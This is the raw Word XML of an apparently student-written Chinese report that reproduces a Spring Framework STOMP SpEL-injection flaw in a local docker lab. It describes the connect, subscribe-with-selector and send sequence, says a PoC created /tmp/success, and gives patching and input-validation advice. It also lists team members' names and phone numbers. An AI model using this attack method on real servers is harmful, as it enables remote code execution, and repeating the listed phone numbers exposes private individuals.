          <w:p w14:paraId="6F66300C" w14:textId="0BE66588" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>全局影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00441909" w14:paraId="40F52A52" w14:textId="77777777" w:rsidTr="00441909">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5606C511" w14:textId="502B1EED" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据保密性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5CC3071F" w14:textId="54B90707" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00441909" w14:paraId="2077754D" w14:textId="77777777" w:rsidTr="00441909">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="18656183" w14:textId="59D43638" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="045A8A47" w14:textId="5EEAC856" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>传输被破坏</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00441909" w14:paraId="5052E733" w14:textId="77777777" w:rsidTr="00441909">
        <w:trPr>
          <w:trHeight w:val="312"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="21DBC498" w14:textId="5DB2578B" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务器危害</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0711C8D9" w14:textId="1DD55C38" w:rsidR="00441909" w:rsidRDefault="00441909" w:rsidP="00441909">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>无影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4506CFC7" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17"/>
    <w:p w14:paraId="315DD6AB" w14:textId="727EF414" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc32430"/>
      <w:bookmarkStart w:id="8" w:name="_Toc8277"/>
      <w:bookmarkStart w:id="9" w:name="_Toc173000407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</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="78011BA2" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc21093"/>
      <w:bookmarkStart w:id="11" w:name="_Toc10156"/>
      <w:bookmarkStart w:id="12" w:name="_Toc173000408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pPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8170" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="802"/>
        <w:gridCol w:w="1722"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B50C17" w14:paraId="73CAA12F" w14:textId="77777777" w:rsidTr="005B6830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8E1AEC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ABC05A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FF16C2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18F70D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B50C17" w14:paraId="37E69752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9684C1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6FC38C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AD86C2" w14:textId="2613FDAF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侯博文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A17A375" w14:textId="0C635190" w:rsidR="00B50C17" w:rsidRDefault="004F650C" w:rsidP="005B6830">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts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13022498745</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="657E5CDE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47FA22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853BFEB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F684D8" w14:textId="080B99C7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陆皓喆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5330A7" w14:textId="54E18BB2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/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>15058298819</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="7AB3F4C9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BDA78F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D1FCE7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E00F99" w14:textId="32876A08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郝志成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C326CB" w14:textId="2E33114D" w:rsidR="00B50C17" w:rsidRDefault="008B500C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8B500C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15063560713</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="61872487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C2C851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8BAAA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1EEA10" w14:textId="5EB5524E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秦德龙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064B64" w14:textId="6DED204E" w:rsidR="00B50C17" w:rsidRDefault="0088351C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88351C">
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>16622753767</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="2313B5A3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89129C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FCB63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0E77701" w14:textId="3ED4338D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胡博浩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CD5A73" w14:textId="75479BAD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/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>18270856986</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="462BE91C" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="14" w:name="_Toc18367"/>
      <w:bookmarkStart w:id="15" w:name="_Toc173000409"/>
      <w:r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1D9AA82C" w14:textId="4BB9A1CB" w:rsidR="00B50C17" w:rsidRPr="00116DFF" w:rsidRDefault="00116DFF" w:rsidP="00116DFF">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00116DFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>spring framework &lt; 4.3.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00116DFF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5.0.0 &lt;= spring framework &lt; 5.0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，在本地部署测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51326105" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc33"/>
      <w:bookmarkStart w:id="17" w:name="_Toc5023"/>
      <w:bookmarkStart w:id="18" w:name="_Toc173000410"/>
      <w:r>
        <w:lastRenderedPageBreak/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376"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B50C17" w14:paraId="6493C19B" w14:textId="77777777" w:rsidTr="005B6830">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14C0F022" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17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48C910BB" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17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B50C17" w14:paraId="6786EAB9" w14:textId="77777777" w:rsidTr="005B6830">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="137731D3" w14:textId="04CFD084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376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EBF2F50" w14:textId="67214F00" w:rsidR="00B50C17" w:rsidRDefault="001F151A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通过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配置文件搭建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环境，环境启动后访问</w:t>
            </w:r>
            <w:r w:rsidRPr="001F151A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http://your-ip:8080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验证是否搭建成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="0438B759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3DE7B32B" w14:textId="297F284F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376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25ECFCAC" w14:textId="00BA10B4" w:rsidR="00CA1594" w:rsidRPr="00CA1594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首先发送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connect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消息，建立与服务器的连接。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FA61998" w14:textId="39203103" w:rsidR="00CA1594" w:rsidRPr="00CA1594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接着发送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subscribe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消息，订阅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某一个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地址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如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/topic/greetings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，并在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selector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字段中插入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表达式。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CD14B0A" w14:textId="00FDB650" w:rsidR="00B50C17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最后发送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send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消息，向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/app/hello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发送包含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name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字段的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JSON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数据，从而触发服务器向订阅地址发送消息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导致服务器执行插入的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表达式。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="11E4BE9C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29A864B7" w14:textId="6A75595B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编写</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F6057C4" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00CA1594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按照漏洞复现的流程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，我们先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使用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SockJS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协议连接到目标服务器，初始化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WebSocket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连接。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25BCC92F" w14:textId="77777777" w:rsidR="00CA1594" w:rsidRPr="006447A4" w:rsidRDefault="00CA1594" w:rsidP="006447A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然后依次发送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connect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subscribe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请求消息、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send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消息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C2C7DD9" w14:textId="4466A475" w:rsidR="00CA1594" w:rsidRPr="00CA1594" w:rsidRDefault="00CA1594" w:rsidP="006447A4">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLineChars="200" w:firstLine="480"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr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最终触发恶意</w:t>
            </w:r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表达式的执行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B50C17" w14:paraId="7F55996C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0F7112CF" w14:textId="03A663DE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提交</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FEB4226" w14:textId="44D12343" w:rsidR="00B50C17" w:rsidRDefault="00CA1594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整理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脚本，提交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14:paraId="11EBBA8D" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc29668"/>
      <w:bookmarkStart w:id="20" w:name="_Toc18669"/>
      <w:bookmarkStart w:id="21" w:name="_Toc173000411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B50C17" w14:paraId="7C3601A1" w14:textId="77777777" w:rsidTr="005B6830">
        <w:trPr>
          <w:trHeight w:val="567"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1403" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B605F82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5B3CBF1D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447CA0EA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B50C17" w14:paraId="256F685D" w14:textId="77777777" w:rsidTr="005B6830">
        <w:trPr>
          <w:trHeight w:val="567"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1403" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EE96869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1B5765C7" w14:textId="733C1EA8" w:rsidR="00B50C17" w:rsidRDefault="00CA1594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02E850C6" w14:textId="6FA9956D" w:rsidR="00B50C17" w:rsidRDefault="00693332" w:rsidP="00693332">
            <w:pPr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攻击路径远程，攻击复杂度容易，无需权限，影响范围为全局，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>POC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>已公开，会造成数据泄露、传输被破坏。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E6499EC" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17"/>
    <w:p w14:paraId="0471DF76" w14:textId="6D573B2C" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="23" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="24" w:name="_Toc173000412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6257CB7B" w14:textId="42EDE44F" w:rsidR="00A31640" w:rsidRDefault="00693332" w:rsidP="00B50C17">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地配置好</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境后，根据实际的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r w:rsidR="00A31640">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439325E4" w14:textId="77777777" w:rsidR="00A31640" w:rsidRDefault="00A31640" w:rsidP="00A31640">
      <w:r w:rsidRPr="00A31640">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="116D49D2" wp14:editId="24CBA216">
            <wp:extent cx="5274310" cy="1210310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="101645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5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664" w14:textId="47342044" w:rsidR="00A31640" w:rsidRDefault="00693332" w:rsidP="00A31640">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后执行编写好的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r w:rsidR="00A31640">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B26C6A2" w14:textId="3ECCED8B" w:rsidR="00A31640" w:rsidRPr="00A31640" w:rsidRDefault="00A31640" w:rsidP="00A31640">
      <w:r w:rsidRPr="00A31640">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01743191" wp14:editId="0EFA9904">
            <wp:extent cx="5274310" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="60699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9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FBD" w14:textId="2D54494C" w:rsidR="00B50C17" w:rsidRDefault="00693332" w:rsidP="00A31640">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入容器中验证：发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/tmp/success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件成功创建，表明漏洞复现成功！</w:t>
      </w:r>
      <w:r w:rsidR="00A31640">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A31640" w:rsidRPr="00A31640">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="158CA11C" wp14:editId="24C4F462">
            <wp:extent cx="5274310" cy="2115820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="38788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5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0592" w14:textId="77E36F97" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17"/>
    <w:p w14:paraId="34BF78B3" w14:textId="337E444F" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc173000413"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="65721C48" w14:textId="4F6CBFF5" w:rsidR="00EC0C11" w:rsidRPr="00EC0C11" w:rsidRDefault="00693332" w:rsidP="00E9482B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>严格在本地搭建漏洞环境，必要时可以切掉与外部网络的连接，不要对线上的运营中的网站进行测试，以免造成危害正常运营。</w:t>
      </w:r>
      <w:r w:rsidR="00EC0C11">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对这个漏洞，可以升级版本和获取补丁。另外，根据漏洞的成因，我们可以在请求订阅信息的</w:t>
      </w:r>
      <w:r w:rsidR="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>selector</w:t>
      </w:r>
      <w:r w:rsidR="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段头添加输入验证和检查，防止恶意</w:t>
      </w:r>
      <w:r w:rsidR="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SpEl</w:t>
      </w:r>
      <w:r w:rsidR="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式的插入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F39987" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc23034"/>
      <w:bookmarkStart w:id="27" w:name="_Toc10352"/>
      <w:bookmarkStart w:id="28" w:name="_Toc173000414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6E4E088D" w14:textId="75E00BC8" w:rsidR="00693332" w:rsidRPr="00E9482B" w:rsidRDefault="00693332" w:rsidP="00693332">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地搭建平台进行漏洞复现，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fofa.info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询在线测试子域名，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指纹平台查询应用指纹，没有找到后提交指纹。通过在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包放包的方式编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码，并在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="00EC0C11"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pocsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境下测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D558B17" w14:textId="0FCADAB0" w:rsidR="00B50C17" w:rsidRPr="00E9482B" w:rsidRDefault="00E9482B" w:rsidP="00EC0C11">
      <w:r w:rsidRPr="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个漏洞的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SpEl</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9482B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式是创建一个文件。通过观察结果的回显或者进入容器中，可以验证漏洞的存在。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C5A9EE" w14:textId="77777777" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17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173000415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01124DBE" w14:textId="70B1E5DD" w:rsidR="00EC0C11" w:rsidRDefault="00EC0C11" w:rsidP="003C0BD7">
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fox-latest; pocsuite-2.0.8; python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；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker desktop-latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows 11</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>burpsuite v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2023.6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B14C842" w14:textId="363D3503" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="575359AD" w14:textId="4A1A3AD4" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17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73000416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33A4298D" w14:textId="32504233" w:rsidR="00B50C17" w:rsidRDefault="00B50C17" w:rsidP="00B50C17">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc173000417"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.1</w:t>
      </w:r>
      <w:r w:rsidR="006447A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
